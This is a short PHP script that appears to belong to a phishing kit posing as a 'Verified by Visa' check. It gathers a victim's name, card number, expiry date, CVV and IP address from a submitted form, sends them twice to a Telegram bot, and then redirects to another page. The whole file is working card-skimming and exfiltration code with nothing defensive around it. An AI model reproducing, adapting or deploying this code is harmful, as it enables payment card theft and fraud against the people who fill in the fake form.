<?php
$ip = getenv("HTTP_CLIENT_IP");
$message .= "---- : || VBV BY LMZBEB  || :------\n";
$message .= "Name: ".$_POST['1']."\n";
$message .= "CC: ".$_POST['3']."\n";
$message .= "Date: ".$_POST['4']."\n";
$message .= "Cvv: ".$_POST['5']."\n";
$message .= "----: || THANKS BE TO GOD || :------\n";
$message .= "IP: ".$ip."\n";
 
$token = "YOURTOKEN";
file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=YOURCHATID&text=" . urlencode($message)."" );
$token = "YOURTOKEN";
file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=YOURCHATID&text=" . urlencode($message)."" );
header("Location: baydorsz.html");
?>